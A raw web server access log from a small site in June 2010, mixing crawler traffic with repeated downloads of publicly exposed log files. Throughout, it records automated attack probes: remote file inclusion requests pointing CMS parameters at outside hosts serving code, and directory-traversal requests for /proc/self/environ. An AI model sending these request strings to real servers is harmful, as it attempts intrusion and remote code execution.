208.80.193.121 - - [16/Jun/2010:16:01:18 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322; ZangoToolbar 4.8.2)" "virtualsupplynet.com"
88.250.57.232 - - [16/Jun/2010:16:40:04 -0700] "GET /logs/access_100615.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [16/Jun/2010:16:40:05 -0700] "GET /logs/access_100616.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:34 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:35 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:36 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:37 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [16/Jun/2010:18:13:38 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
174.127.132.10 - - [16/Jun/2010:18:14:52 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)" "www.virtualsupplynet.com"
98.126.74.66 - - [16/Jun/2010:18:49:54 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [16/Jun/2010:19:21:25 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
69.196.187.47 - - [16/Jun/2010:20:46:00 -0700] "GET /sitemap.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "www.virtualsupplynet.com"
207.241.227.85 - - [16/Jun/2010:20:46:00 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "ia_archiver-web.archive.org" "www.virtualsupplynet.com"
69.147.244.168 - - [16/Jun/2010:21:47:38 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
69.147.244.168 - - [16/Jun/2010:21:47:38 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
77.88.31.246 - - [16/Jun/2010:22:25:52 -0700] "GET /logs/access_100501.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
116.24.199.212 - - [16/Jun/2010:23:00:43 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
98.126.74.66 - - [16/Jun/2010:23:14:13 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
174.127.132.10 - - [16/Jun/2010:23:28:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)" "virtualsupplynet.com"
62.149.228.103 - - [17/Jun/2010:00:25:39 -0700] "GET /modules/Forums/admin/admin_users.php?phpbb_root_path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.virtualsupplynet.com"
203.73.201.212 - - [17/Jun/2010:00:45:05 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
195.190.166.35 - - [17/Jun/2010:01:03:06 -0700] "GET /includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
195.190.166.35 - - [17/Jun/2010:01:03:06 -0700] "GET /logs//includes/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:03:13:16 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:22 -0700] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:22 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:35 -0700] "HEAD /logs/access.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:35 -0700] "GET /logs/access.log HTTP/1.1" 206 82039 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:37 -0700] "HEAD /logs/access_100123.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:37 -0700] "HEAD /logs/access_100130.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:37 -0700] "HEAD /logs/access_100206.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:38 -0700] "HEAD /logs/access_100213.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:38 -0700] "HEAD /logs/access_100220.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:39 -0700] "HEAD /logs/access_100227.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:39 -0700] "HEAD /logs/access_100306.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:39 -0700] "HEAD /logs/access_100313.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:40 -0700] "HEAD /logs/access_100320.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:40 -0700] "HEAD /logs/access_100327.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:41 -0700] "HEAD /logs/access_100403.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:41 -0700] "HEAD /logs/access_100410.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:41 -0700] "HEAD /logs/access_100417.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:42 -0700] "HEAD /logs/access_100424.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:42 -0700] "HEAD /logs/access_100501.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:42 -0700] "HEAD /logs/access_100508.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:43 -0700] "HEAD /logs/access_100515.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:43 -0700] "HEAD /logs/access_100522.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:44 -0700] "HEAD /logs/access_100529.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:44 -0700] "HEAD /logs/access_100605.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.68.97.132 - - [17/Jun/2010:04:14:44 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.79 [en] (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:44 -0700] "GET /logs/access_100605.log HTTP/1.1" 206 125664 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:46 -0700] "HEAD /logs/access_100612.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:46 -0700] "GET /logs/access_100612.log HTTP/1.1" 206 104934 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [17/Jun/2010:04:14:48 -0700] "HEAD /logs/scripts.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:04:16:58 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
77.88.31.246 - - [17/Jun/2010:05:24:57 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:05:57:22 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
74.222.5.146 - - [17/Jun/2010:06:30:31 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://www.virtualsupplynet.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
98.126.74.66 - - [17/Jun/2010:07:19:44 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
125.231.229.246 - - [17/Jun/2010:07:26:33 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
193.231.187.33 - - [17/Jun/2010:07:53:33 -0700] "GET /mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
193.231.187.33 - - [17/Jun/2010:07:53:33 -0700] "GET /logs/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
208.80.193.39 - - [17/Jun/2010:10:06:02 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; HbTools 4.7.7; SpamBlockerUtility 4.8.0)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:44 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:46 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:47 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:48 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.142.138 - - [17/Jun/2010:10:49:49 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:11:05:16 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:05 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:06 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:07 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:08 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [17/Jun/2010:11:28:13 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
77.88.31.246 - - [17/Jun/2010:12:14:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
206.123.118.132 - - [17/Jun/2010:12:17:24 -0700] "GET /logs/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
206.123.118.132 - - [17/Jun/2010:12:17:24 -0700] "GET /galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
212.223.162.135 - - [17/Jun/2010:12:20:18 -0700] "GET /logs/galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
212.223.162.135 - - [17/Jun/2010:12:20:18 -0700] "GET /galleria.html.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
112.105.94.93 - - [17/Jun/2010:13:13:27 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
89.111.176.231 - - [17/Jun/2010:13:38:24 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
89.111.176.231 - - [17/Jun/2010:13:38:24 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.virtualsupplynet.com"
61.224.223.16 - - [17/Jun/2010:14:04:36 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
94.23.243.156 - - [17/Jun/2010:14:08:55 -0700] "GET /logs/access_100206.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.243.156 - - [17/Jun/2010:14:08:55 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.243.156 - - [17/Jun/2010:14:08:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://infoambiente.crotone.it/ecommerce//administrator/components/com_virtuemart/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:14:33:20 -0700] "GET /logs/access_100116.log//admin/business_inc/saveserver.php?thisdir=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:14:33:21 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:14:33:21 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
116.30.160.191 - - [17/Jun/2010:14:36:44 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
88.250.57.232 - - [17/Jun/2010:16:39:37 -0700] "GET /logs/access_100616.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [17/Jun/2010:16:39:38 -0700] "GET /logs/access_100617.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.214.206.82 - - [17/Jun/2010:16:46:37 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "virtualsupplynet.com"
88.214.206.82 - - [17/Jun/2010:16:46:37 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "virtualsupplynet.com"
88.214.206.82 - - [17/Jun/2010:16:46:37 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" "virtualsupplynet.com"
98.126.74.66 - - [17/Jun/2010:16:58:04 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:18:07:48 -0700] "GET /logs/access_100213.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:18:07:48 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
94.23.45.80 - - [17/Jun/2010:18:07:49 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sorraia.com.br//images/stories/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.virtualsupplynet.com"
67.195.115.249 - - [17/Jun/2010:18:49:44 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
67.195.115.249 - - [17/Jun/2010:18:49:44 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:19:58:31 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
219.81.148.251 - - [17/Jun/2010:19:59:59 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:20:42:29 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
208.80.193.34 - - [17/Jun/2010:21:22:18 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {FB2AD421-F311-ECD3-2715-DACEC5EECB5C}; .NET CLR 1.1.4322)" "virtualsupplynet.com"
112.104.217.61 - - [17/Jun/2010:22:17:57 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
114.44.4.236 - - [17/Jun/2010:23:19:43 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
216.18.213.162 - - [17/Jun/2010:23:19:45 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
213.171.37.206 - - [17/Jun/2010:23:21:43 -0700] "GET /logs/mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
213.171.37.206 - - [17/Jun/2010:23:21:43 -0700] "GET /mambots/errors.php?error=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
61.224.223.16 - - [17/Jun/2010:23:25:21 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
193.47.80.41 - - [17/Jun/2010:23:35:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [17/Jun/2010:23:35:27 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
123.64.68.43 - - [18/Jun/2010:01:28:20 -0700] "GET /logs/access_100522.log HTTP/1.1" 200 103608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.virtualsupplynet.com"
205.251.131.33 - - [18/Jun/2010:01:28:40 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
205.251.131.33 - - [18/Jun/2010:01:28:40 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.14.32.241 - - [18/Jun/2010:01:28:54 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
207.14.32.241 - - [18/Jun/2010:01:28:55 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
212.223.162.135 - - [18/Jun/2010:01:29:50 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
212.223.162.135 - - [18/Jun/2010:01:29:50 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
178.162.160.76 - - [18/Jun/2010:01:29:56 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
178.162.160.76 - - [18/Jun/2010:01:29:56 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
178.18.116.70 - - [18/Jun/2010:01:30:05 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
178.18.116.70 - - [18/Jun/2010:01:30:05 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.vincenttractors.co.uk/images/cache/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.virtualsupplynet.com"
211.53.209.67 - - [18/Jun/2010:01:36:57 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
211.53.209.67 - - [18/Jun/2010:01:36:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.virtualsupplynet.com"
114.108.151.149 - - [18/Jun/2010:01:37:11 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [18/Jun/2010:01:37:12 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [18/Jun/2010:01:37:14 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
114.108.151.149 - - [18/Jun/2010:01:37:14 -0700] "GET /index.php?option=com_virtuemart&Itemid=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
